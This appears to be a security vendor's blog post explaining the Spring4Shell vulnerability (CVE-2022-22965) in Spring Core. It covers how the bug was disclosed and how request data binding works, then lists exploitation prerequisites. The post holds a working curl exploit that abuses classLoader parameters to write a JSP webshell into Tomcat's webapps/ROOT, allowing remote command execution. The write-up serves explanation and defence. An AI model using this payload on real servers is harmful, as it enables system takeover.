TL;DR: CVE-2022-22965 is a Critical Zero-Day RCE Vulnerability in Spring Core due to how parameters are deserialized to Java objects by Spring. We have created an open-source exploit PoC with a vulnerble application and exploit payload you can try right now: spring4shell-exploit-poc.
How was Spring4shell or CVE-2022-22965 discovered?
On March 29th 2022, A chinese security researcher on Twitter released screenshots showing RCE in a Spring Core application which is now assigned CVE-2022-22965. The researcher also released a Python exploit and a vulnerability report written in Chinese. The tweets have since been deleted and the researcher has deleted their accounts.
The assigment of the CVE took some time as to analyse and confirm the vulnerability posted by the researcher. The CVE was assigned on March 31st, 2022, given a Critical and a CVSS score of 9.8.
How does Spring4shell work?
Our HelloController below contains a @PostMapping to /greeting. When we request this route via the Tomcat server, http://app/helloworld/greeting, it transforms the HTTP request data into a POJO or Plain Old Java Object, in this case, a Greeting object. Under the hood, Spring uses deserialization to convert this request data into Java objects, mapping each field to a value in the Java object. As it turns out, you can set many more fields including the properties of a class.
1@Controller 2public class HelloController { 3 @GetMapping("/greeting") 4 public String greetingForm(Model model) { 5 model.addAttribute("greeting", new Greeting()); 6 return "hello"; 7 } 8 9 @PostMapping("/greeting") 10 public String greetingSubmit(@ModelAttribute Greeting greeting, Model model) { 11 return "hello"; 12 } 13}
Using curl we combine a few headers and POST data and are able to write a JSP webshell to webapps/ROOT on the contain which gives us Remote Code Execution ability via http://app/shell.jsp?cmd=<cmd?.
1$ curl 2-H "prefix:<%" 3-H "suffix:%>//" 4-H "c:Runtime" 5-H "Content-Type: application/x-www-form-urlencoded" 6-d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" 7http://localhost:8080/helloworld/greeting
Impact of Spring4Shell
The impact of vulnerability is wide as it is trivial to exploit and a large amount of Java applications are using Spring. Thus, explaining the high CVSS score. The prequisities to exploit it are common:
- JDK version 9+
- Application built on Spring Or derived frameworks
- Running Tomcat with WAR deployment
Depending on frameworks and libraries is essential, however, vulnerabilities such as Spring4Shell and Log4Shell pose immense risk to the organization. You want to ensure that your security controls are working across the attack surface. FourCore ATTACK can help you ensure this by routinely assessing your security controls with real-world attack simulations.